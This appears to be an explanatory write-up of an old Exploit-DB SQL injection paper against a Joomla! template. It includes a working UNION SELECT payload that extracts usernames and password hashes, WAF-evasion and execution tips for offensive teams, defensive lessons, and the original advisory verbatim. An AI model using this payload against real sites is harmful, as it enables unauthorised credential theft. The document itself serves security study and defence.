Understanding Joomla! Bamboo Simpla Admin Template SQL Injection (CVE-2009-4877)

What this paper is

This paper details a Remote SQL Injection vulnerability found in the Joomla! Bamboo Simpla Admin Template. The vulnerability allows an attacker to extract sensitive data, specifically usernames and passwords from the jos_users table, by manipulating the id parameter in the URL.

Simple technical breakdown

The vulnerability lies in how the component handles user-supplied input for the id parameter. When this parameter is not properly sanitized, an attacker can inject SQL commands. The exploit uses a UNION SELECT statement to append the attacker's desired query (to retrieve usernames and passwords) to the original, legitimate query. This effectively tricks the database into returning the attacker's data along with or instead of the intended data.

Complete code and payload walkthrough

The provided "code" is not actual executable code in the traditional sense but rather a crafted URL and an SQL injection payload.

URL Structure:

http://server/P47H/index.php?option=com_content&view=article&id={EV!L EXPLO!T}

• http://server/P47H/index.php: This is the base URL to the Joomla! installation, specifically targeting the com_content component (which is part of Joomla!'s core content management system). The P47H likely represents a placeholder for the actual path to the Joomla! installation.
• option=com_content&view=article: These parameters indicate that the request is for viewing a specific article within the com_content component.
• id={EV!L EXPLO!T}: This is the critical part. The id parameter is intended to specify which article to display. However, it is vulnerable to SQL injection. {EV!L EXPLO!T} is a placeholder for the malicious SQL query.

SQL Injection Payload:

-666/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--

Let's break down this payload:

• -666: This is likely an attempt to make the original query fail or return no results. By providing an id that doesn't exist (e.g., a negative number or a value that would cause an error in the original query), the attacker ensures that their injected UNION SELECT statement is the primary source of data returned.
• /**/: This is a comment syntax used in SQL. The attacker uses it to bypass potential filters that might look for spaces. /**/ effectively acts as a space.
• union: This SQL keyword is used to combine the result set of two or more SELECT statements. The attacker is combining the (likely failed) original query with their own query.
• select: This begins the attacker's query.
• 1,2,concat(username,0x3a,password),4,5,6,7,8: This is the core of the data extraction.
  • 1,2,4,5,6,7,8: These are placeholder columns. The number of columns in the UNION SELECT statement must match the number of columns in the original SELECT statement that the UNION is being appended to. The original query likely selects 8 columns. The attacker only cares about one specific column, so they fill the others with dummy values.
  • concat(username,0x3a,password): This is the crucial part that extracts the data.
    • concat(): This is a SQL function that concatenates (joins) multiple strings together.
    • username: This refers to the username column in the jos_users table.
    • 0x3a: This is the hexadecimal representation of the colon character (:). It's used as a separator between the username and password.
    • password: This refers to the password column in the jos_users table.
    • The entire concat() function will produce a string like "admin:hashedpassword".
• /**/from/**/jos_users: This specifies the table from which to retrieve the data, which is jos_users. This is the standard table in Joomla! that stores user credentials.
• --: This is a comment character in SQL. It comments out the rest of the original query, preventing syntax errors and ensuring only the attacker's injected query is executed.

Mapping list:

• http://server/P47H/index.php?option=com_content&view=article&id=: Base URL and parameters to trigger article viewing.
• -666: Attempt to invalidate the original query.
• /**/: SQL comment, used as a space to bypass filters.
• union: SQL keyword to combine query results.
• select: SQL keyword to initiate a query.
• 1,2,4,5,6,7,8: Placeholder columns to match the original query's column count.
• concat(username,0x3a,password): Function to extract and format username and password from the jos_users table.
• from jos_users: Specifies the target table for data extraction.
• --: SQL comment to terminate the original query.

Practical details for offensive operations teams

• Required Access Level: Low. This is a remote, unauthenticated vulnerability. An attacker does not need any prior access to the Joomla! site.
• Lab Preconditions:
  • A vulnerable Joomla! installation with the Bamboo Simpla Admin Template component installed.
  • Knowledge of the Joomla! installation path and the base URL.
  • A target Joomla! database with at least one user account in the jos_users table.
• Tooling Assumptions:
  • A web browser for manual testing or crafting requests.
  • A web proxy (e.g., Burp Suite, OWASP ZAP) to intercept and modify requests.
  • An SQL injection tool (e.g., sqlmap) could potentially automate this, but the specific payload structure might require manual configuration.
• Execution Pitfalls:
  • WAF/IDS Evasion: The use of /**/ for spaces is a common evasion technique. More sophisticated Web Application Firewalls (WAFs) might still detect this.
  • Incorrect Column Count: If the original query in com_content selects a different number of columns than 8, the UNION SELECT will fail. The attacker would need to enumerate the correct column count.
  • Database Specific Syntax: While UNION SELECT and concat are widely supported, minor variations in SQL syntax or database configurations could cause issues.
  • Output Encoding: The extracted data might be HTML-encoded or otherwise processed by Joomla! before being displayed, making it slightly harder to read directly from the browser.
  • Path Discovery: Identifying the correct P47H to the Joomla! installation is a prerequisite.
• Expected Telemetry:
  • Web Server Logs: Unusual GET requests to index.php with the option=com_content and id parameters containing SQL keywords (union, select, concat, from, --).
  • Database Logs: Potentially, queries that deviate from normal article retrieval, especially if the database logging is configured to capture executed SQL statements. However, this is less common for standard web application setups.
  • WAF/IDS Alerts: If a WAF is in place, it might flag the request as a potential SQL injection attempt.

Where this was used and when

• Context: This vulnerability was discovered and published in January 2010. It targets a specific Joomla! template component.
• Timeframe: The exploit would have been relevant around 2010 and for some time afterward until the component was patched or updated. Given the age of the vulnerability, it's highly unlikely to be a zero-day in modern, patched systems. However, unpatched legacy systems could still be vulnerable.

Defensive lessons for modern teams

• Input Validation and Sanitization: This is the primary defense. All user-supplied input, especially parameters used in database queries, must be rigorously validated and sanitized. This includes:
  • Using parameterized queries or prepared statements to separate SQL code from data.
  • Escaping special characters that have meaning in SQL.
  • Whitelisting acceptable input formats and values.
• Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common attack patterns, including SQL injection attempts. Keep WAF rules updated.
• Regular Patching and Updates: Keep Joomla! core, extensions, and templates updated to the latest versions. Vendors typically release patches for known vulnerabilities.
• Principle of Least Privilege: Ensure that the database user account used by the web application has only the necessary permissions. It should not have administrative rights or the ability to drop tables, for example.
• Error Handling: Configure error reporting to not reveal detailed database error messages to end-users, as these can provide attackers with valuable information about the database structure and vulnerabilities.
• Security Audits and Code Reviews: Regularly audit web application code for potential vulnerabilities, especially in areas handling user input and database interactions.

ASCII visual (if applicable)

This vulnerability is a direct manipulation of a web request to the server. An ASCII visual can illustrate the flow of the malicious request.

+-----------------+      +-----------------+      +-------------------+      +-----------------+
| Attacker's      |----->| Web Browser/    |----->| Web Server        |----->| Joomla!         |
| Machine         |      | Proxy           |      | (Vulnerable App)  |      | Application     |
+-----------------+      +-----------------+      +-------------------+      +-----------------+
       ^                                                                              |
       |                                                                              |
       | Malicious GET Request                                                        |
       | (with SQLi payload)                                                          |
       |                                                                              v
       |                                                                    +-------------------+
       |                                                                    | Database Server   |
       |                                                                    | (jos_users table) |
       |                                                                    +-------------------+
       |                                                                              |
       |                                                                              | Returns
       |                                                                              | Attacker's
       |                                                                              | Data
       +------------------------------------------------------------------------------+

Source references

• Paper ID: 10971
• Paper Title: Joomla! Component Bamboo Simpla Admin Template - SQL Injection
• Author: R3d-D3V!L
• Published: 2010-01-03
• Paper URL: https://www.exploit-db.com/papers/10971
• Raw URL: https://www.exploit-db.com/raw/10971

Original Exploit-DB Content (Verbatim)

[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe: Joomla Bamboo Simpla Admin Template suffer from REMOTe sql injection
[~] Vendor: .joomlabamboo.com
[?] Software:Joomla Bamboo Simpla Admin Template
[-]
[?] author: ((R3d-D3v!L))
[?] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY
[?] contact: N/A
[-]
[?] Date: 3.Jan.2010
[?] T!ME: 09:15 am GMT
[?] Home: WwW.xP10.ME
[?]
[?]
[-]??????????????????????{DEV!L'5 of SYST3M}??????????????????


[*] Err0r C0N50L3:


http://server/P47H/index.php?option=com_content&view=article&id= {EV!L EXPLO!T}

[~] {EV!L EXPLO!T}:

-666/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--



N073:

REAL RED DEV!L W@S h3r3 LAMERZ


GAZA !N our hearts !


[~]-----------------------------{((Angela Bennett))}---------------------------------------


[~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987

[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ

[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4

[?]spechial SupP0RT: MY M!ND ;) & ((OFFsec))

[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t))

[~]spechial FR!ND: 74M3M

[~] !'M 4R48!4N 3XPL0!73R.

[~]{[(D!R 4ll 0R D!E)]};

[~]---------------------------------------------------------------------------------------------